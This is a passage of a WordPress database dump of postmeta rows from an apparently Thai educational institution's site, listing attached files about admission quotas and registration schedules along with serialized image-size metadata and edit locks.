'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2019/12/25126301.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25126301-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"25126301-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25126301-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25126301-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25126301-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27283, 11035, '_edit_lock', '1609737224:14'),
(27284, 11035, '_edit_last', '14'),
(27285, 11036, '_wp_attached_file', '2020/12/ประกาศผลโควตาภายใน2564.pdf'),
(27286, 11037, '_wp_attached_file', '2020/12/ประกาศผลโควตาภายนอก2564.pdf'),
(27287, 11035, '_hide_featured', NULL),
(27288, 11039, '_edit_lock', '1609737174:14'),
(27289, 11039, '_edit_last', '14'),
(27290, 11039, '_hide_featured', NULL),
(27291, 11045, '_wp_attached_file', '2019/12/S__8167498.jpg'),
(27292, 11045, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:22:\"2019/12/S__8167498.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"S__8167498-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"S__8167498-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"S__8167498-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"S__8167498-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27293, 11047, '_wp_attached_file', '2021/01/ประกาศผลโควตาภายนอก25641.pdf'),
(27294, 11049, '_wp_attached_file', '2021/01/ประกาศผลโควตาภายใน25641.pdf'),
(27295, 11053, '_wp_attached_file', '2019/12/040164-01.png'),
(27296, 11053, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:21:\"2019/12/040164-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040164-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"040164-01-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040164-01-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040164-01-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040164-01-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27297, 11056, '_edit_lock', '1611023608:14'),
(27298, 11056, '_edit_last', '14'),
(27299, 11057, '_wp_attached_file', '2021/01/ประกาศงานหลักสูตร.pdf'),
(27302, 11056, '_hide_featured', NULL),
(27307, 11059, '_wp_attached_file', '2019/12/ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร.jpg'),
(27308, 11059, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:108:\"2019/12/ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:108:\"ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:108:\"ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:109:\"ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:109:\"ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:108:\"ประกาศแก้ไขกำหนดการขึ้นทะเบียนนร-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27311, 11064, '_wp_attached_file', '2019/12/FB_IMG_1611831883162.jpg'),
(27312, 11064, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:32:\"2019/12/FB_IMG_1611831883162.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1611831883162-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1611831883162-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1611831883162-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27313, 11065, '_wp_attached_file', '2019/12/FB_IMG_1611831883162-1.jpg'),
(27314, 11065, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:34:\"2019/12/FB_IMG_1611831883162-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1611831883162-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1611831883162-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1611831883162-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27315, 11067, '_wp_attached_file', '2019/12/FB_IMG_1612162497297.jpg'),
(27316, 11067, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:405;s:4:\"file\";s:32:\"2019/12/FB_IMG_1612162497297.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1612162497297-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1612162497297-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1612162497297-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27317, 11068, '_wp_attached_file', '2019/12/FB_IMG_1612162497297-1.jpg'),
(27318, 11068, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:405;s:4:\"file\";s:34:\"2019/12/FB_IMG_1612162497297-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1612162497297-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1612162497297-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1612162497297-1-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27327, 11073, '_wp_attached_file', '2018/01/Untitled-1.jpg'),
(27328, 11073, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2018/01/Untitled-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27333, 11078, '_wp_attached_file', '2019/12/030264.png'),
(27334, 11078, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:18:\"2019/12/030264.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"030264-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"030264-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"030264-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"030264-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"030264-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27337, 11082, '_wp_attached_file', '2021/02/ประกาศแก้ไขกำหนดการขึ้นทะเบียนและหลักเก.pdf'),
(27338, 11083, '_edit_lock', '1613733393:14'),
(27339, 11083, '_edit_last', '14'),
(27340, 11083, '_hide_featured', NULL),
(27341, 11087, '_wp_attached_file', '2019/12/144977359_1298237780552407_7484903034801200145_o.jpg'),
(27342, 11087, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:60:\"2019/12/144977359_1298237780552407_7484903034801200145_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"144977359_1298237780552407_7484903034801200145_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"144977359_1298237780552407_7484903034801200145_o-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"144977359_1298237780552407_7484903034801200145_o-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"144977359_1298237780552407_7484903034801200145_o-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"144977359_1298237780552407_7484903034801200145_o-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27343, 11089, '_wp_attached_file', '2019/12/040264.png'),
(27344, 11089, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:18:\"2019/12/040264.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"040264-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"040264-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"040264-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"040264-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"040264-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27345, 11090, '_edit_lock', '1614064867:14'),
(27346, 11090, '_edit_last', '14'),
(27347, 11091, '_wp_attached_file', '2021/02/ประกาศผลการคัดเลือกโควตาป.ตรี-2564.pdf'),
(27348, 11090, '_hide_featured', NULL),
(27349, 11096, '_wp_attached_file', '2019/12/144977359_1298237780552407_7484903034801200145_o-1.jpg'),
(27350, 11096, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:62:\"2019/12/144977359_1298237780552407_7484903034801200145_o-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"144977359_1298237780552407_7484903034801200145_o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"144977359_1298237780552407_7484903034801200145_o-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:62:\"144977359_1298237780552407_7484903034801200145_o-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"144977359_1298237780552407_7484903034801200145_o-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"144977359_1298237780552407_7484903034801200145_o-1-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27351, 11098, '_wp_attached_file', '2019/12/กำหนดการ.jpg'),
(27352, 11098, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:36:\"2019/12/กำหนดการ.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"กำหนดการ-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"กำหนดการ-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"กำหนดการ-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"กำหนดการ-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27353, 11099, '_wp_attached_file', '2019/12/ต่อกำหนดการ.jpg'),
(27354, 11099, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:72;s:4:\"file\";s:45:\"2019/12/ต่อกำหนดการ.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"ต่อกำหนดการ-150x72.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"ต่อกำหนดการ-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27355, 11101, '_wp_attached_file', '2019/12/ต่อกำหนดการ-1.jpg'),
(27356, 11101, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:360;s:6:\"height\";i:72;s:4:\"file\";s:47:\"2019/12/ต่อกำหนดการ-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"ต่อกำหนดการ-1-150x72.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"ต่อกำหนดการ-1-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27360, 11107, '_wp_attached_file', '2019/12/ประกาศลงทะเบียน.jpg'),
(27361, 11107, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:57:\"2019/12/ประกาศลงทะเบียน.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"ประกาศลงทะเบียน-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"ประกาศลงทะเบียน-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"ประกาศลงทะเบียน-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"ประกาศลงทะเบียน-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27362, 11109, '_wp_attached_file', '2019/12/ปวช.โควตา.jpg'),
